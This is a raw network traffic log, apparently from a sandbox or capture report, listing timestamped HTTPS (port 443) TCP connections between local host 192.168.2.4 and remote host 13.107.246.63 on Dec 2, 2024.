                                                          Dec 2, 2024 17:56:31.344568014 CET4434982413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:31.344618082 CET49824443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:31.344727993 CET49824443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:31.344739914 CET4434982413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:31.344748974 CET49824443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:31.344752073 CET4434982413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:31.347506046 CET49832443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:31.347538948 CET4434983213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:31.347611904 CET49832443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:31.347744942 CET49832443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:31.347758055 CET4434983213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.247860909 CET4434982813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.248543978 CET49828443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.248573065 CET4434982813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.249934912 CET49828443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.249939919 CET4434982813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.446217060 CET4434983013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.446608067 CET49830443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.446624041 CET4434983013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.447053909 CET49830443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.447057009 CET4434983013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.473934889 CET4434982913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.474371910 CET49829443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.474390984 CET4434982913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.474786043 CET49829443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.474791050 CET4434982913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.691999912 CET4434982813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.692054033 CET4434982813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.692106009 CET49828443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.692265034 CET49828443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.692280054 CET4434982813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.692287922 CET49828443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.692292929 CET4434982813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.694904089 CET49833443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.694930077 CET4434983313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.695017099 CET49833443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.695168972 CET49833443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.695182085 CET4434983313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.884663105 CET4434983013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.884702921 CET4434983013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.884757042 CET49830443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.884948969 CET49830443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.884959936 CET4434983013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.884970903 CET49830443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.884974957 CET4434983013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.887815952 CET49834443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.887855053 CET4434983413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.887918949 CET49834443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.888046026 CET49834443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.888061047 CET4434983413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.911437988 CET4434982913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.911509037 CET4434982913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.911559105 CET49829443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.911710978 CET49829443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.911720991 CET4434982913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.911731958 CET49829443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.911736965 CET4434982913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.913866043 CET49835443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.913887978 CET4434983513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:32.913960934 CET49835443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.914110899 CET49835443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:32.914122105 CET4434983513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.016591072 CET4434983113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.017097950 CET49831443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.017122030 CET4434983113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.017544031 CET49831443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.017549038 CET4434983113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.070063114 CET4434983213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.070430994 CET49832443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.070456028 CET4434983213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.070781946 CET49832443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.070786953 CET4434983213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.467654943 CET4434983113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.467714071 CET4434983113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.467765093 CET49831443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.467963934 CET49831443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.467977047 CET4434983113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.467988014 CET49831443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.467993021 CET4434983113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.470782042 CET49836443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.470817089 CET4434983613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.470904112 CET49836443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.471071959 CET49836443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.471084118 CET4434983613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.506927013 CET4434983213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.506993055 CET4434983213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.507045031 CET49832443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.507216930 CET49832443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.507236004 CET4434983213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.507245064 CET49832443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.507250071 CET4434983213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.509783983 CET49837443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.509820938 CET4434983713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:33.509895086 CET49837443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.510088921 CET49837443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:33.510102987 CET4434983713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:34.546776056 CET4434983313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:34.547363043 CET49833443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:34.547384024 CET4434983313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:34.548124075 CET49833443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:34.548130035 CET4434983313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:34.633323908 CET4434983513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:34.633748055 CET49835443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:34.633757114 CET4434983513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:34.634139061 CET49835443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:34.634144068 CET4434983513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:34.674865007 CET4434983413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:34.675482035 CET49834443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:34.675504923 CET4434983413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:34.676801920 CET49834443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:34.676805973 CET4434983413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.064165115 CET4434983313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.064235926 CET4434983313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.064294100 CET49833443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.064495087 CET49833443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.064506054 CET4434983313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.064517021 CET49833443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.064522982 CET4434983313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.068612099 CET49838443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.068654060 CET4434983813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.068721056 CET49838443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.068871975 CET49838443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.068886042 CET4434983813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.121851921 CET4434983513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.121949911 CET4434983513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.122014999 CET49835443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.122407913 CET49835443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.122411966 CET4434983513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.122433901 CET49835443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.122437000 CET4434983513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.124876022 CET49839443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.124903917 CET4434983913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.124979973 CET49839443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.125114918 CET49839443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.125128031 CET4434983913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.131663084 CET4434983413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.131721973 CET4434983413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.131778955 CET49834443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.131942034 CET49834443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.131958008 CET4434983413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.131983042 CET49834443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.131988049 CET4434983413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.134468079 CET49840443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.134484053 CET4434984013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.134571075 CET49840443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.134717941 CET49840443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.134732962 CET4434984013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.321034908 CET4434983613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.321738958 CET49836443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.321769953 CET4434983613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.323100090 CET49836443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.323103905 CET4434983613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.336770058 CET4434983713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.337173939 CET49837443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.337192059 CET4434983713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.338318110 CET49837443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.338321924 CET4434983713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.779337883 CET4434983613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.779411077 CET4434983613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.779468060 CET49836443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.779655933 CET49836443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.779678106 CET4434983613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.779687881 CET49836443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.779694080 CET4434983613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.784223080 CET49841443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.784266949 CET4434984113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.784354925 CET49841443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.784544945 CET49841443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.784559011 CET4434984113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.794051886 CET4434983713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.794110060 CET4434983713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.794166088 CET49837443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.794455051 CET49837443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.794470072 CET4434983713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.794492960 CET49837443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.794497967 CET4434983713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.798913956 CET49842443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.798944950 CET4434984213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:35.799014091 CET49842443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.799145937 CET49842443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:35.799158096 CET4434984213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:36.856760979 CET4434984013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:36.857403040 CET49840443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:36.857419968 CET4434984013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:36.858093023 CET49840443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:36.858098984 CET4434984013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:36.910120010 CET4434983913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:36.910732031 CET49839443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:36.910756111 CET4434983913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:36.911365032 CET49839443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:36.911370039 CET4434983913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:36.918927908 CET4434983813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:36.919321060 CET49838443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:36.919352055 CET4434983813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:36.919768095 CET49838443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:36.919774055 CET4434983813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.293656111 CET4434984013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.293732882 CET4434984013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.293807983 CET49840443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.293982029 CET49840443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.294004917 CET4434984013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.294018984 CET49840443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.294023991 CET4434984013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.297234058 CET49843443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.297280073 CET4434984313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.297388077 CET49843443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.297553062 CET49843443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.297565937 CET4434984313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.362390041 CET4434983913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.362469912 CET4434983913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.362560987 CET49839443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.362762928 CET49839443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.362762928 CET49839443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.362813950 CET4434983913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.362845898 CET4434983913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.365957975 CET49844443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.365987062 CET4434984413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.366082907 CET49844443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.366293907 CET49844443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.366305113 CET4434984413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.377794981 CET4434983813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.377862930 CET4434983813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.377934933 CET49838443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.378078938 CET49838443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.378099918 CET4434983813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.378109932 CET49838443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.378113985 CET4434983813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.381635904 CET49845443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.381659031 CET4434984513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.381748915 CET49845443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.381901026 CET49845443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.381911993 CET4434984513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.502130032 CET4434984113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.502875090 CET49841443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.502902031 CET4434984113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.503900051 CET49841443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.503906012 CET4434984113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.645883083 CET4434984213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.646605968 CET49842443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.646629095 CET4434984213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.647918940 CET49842443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.647924900 CET4434984213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.940084934 CET4434984113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.940151930 CET4434984113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.940212011 CET49841443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.940423012 CET49841443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.940452099 CET4434984113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.940462112 CET49841443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.940466881 CET4434984113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.944828033 CET49846443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.944869041 CET4434984613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:37.944938898 CET49846443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.945593119 CET49846443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:37.945605040 CET4434984613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:38.101561069 CET4434984213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:38.101628065 CET4434984213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:38.101677895 CET49842443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:38.101917982 CET49842443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:38.101933956 CET4434984213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:38.101943970 CET49842443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:38.101948023 CET4434984213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:38.106252909 CET49847443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:38.106290102 CET4434984713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:38.106367111 CET49847443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:38.106530905 CET49847443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:38.106543064 CET4434984713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.023202896 CET4434984313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.023724079 CET49843443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.023755074 CET4434984313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.024343014 CET49843443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.024348021 CET4434984313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.158441067 CET4434984413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.159089088 CET49844443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.159101963 CET4434984413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.160377979 CET49844443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.160382986 CET4434984413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.175493956 CET4434984513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.175832033 CET49845443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.175847054 CET4434984513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.176315069 CET49845443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.176321030 CET4434984513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.489586115 CET4434984313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.489664078 CET4434984313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.489757061 CET49843443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.490006924 CET49843443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.490031004 CET4434984313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.490050077 CET49843443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.490056038 CET4434984313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.493299007 CET49849443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.493352890 CET4434984913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.493438005 CET49849443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.493643045 CET49849443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.493654966 CET4434984913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.603703976 CET4434984413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.603804111 CET4434984413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.603867054 CET49844443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.604027033 CET49844443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.604043961 CET4434984413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.604053974 CET49844443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.604058027 CET4434984413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.607251883 CET49850443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.607294083 CET4434985013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.607383966 CET49850443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.607556105 CET49850443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.607573032 CET4434985013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.620060921 CET4434984513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.620126963 CET4434984513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.620183945 CET49845443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.620378971 CET49845443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.620393991 CET4434984513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.620405912 CET49845443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.620410919 CET4434984513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.622889042 CET49851443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.622903109 CET4434985113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.622980118 CET49851443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.623107910 CET49851443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.623117924 CET4434985113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.694015980 CET4434984613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.695687056 CET49846443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.695698977 CET4434984613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.696376085 CET49846443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.696381092 CET4434984613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.900316000 CET4434984713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.900823116 CET49847443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.900875092 CET4434984713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:39.901393890 CET49847443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:39.901398897 CET4434984713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:40.129456997 CET4434984613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:40.129524946 CET4434984613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:40.129581928 CET49846443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:40.129784107 CET49846443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:40.129797935 CET4434984613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:40.129806042 CET49846443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:40.129810095 CET4434984613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:40.132996082 CET49852443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:40.133032084 CET4434985213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:40.133105993 CET49852443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:40.133287907 CET49852443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:40.133300066 CET4434985213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:40.347242117 CET4434984713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:40.347295046 CET4434984713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:40.347349882 CET49847443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:40.347531080 CET49847443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:40.347551107 CET4434984713.107.246.63192.168.2.4
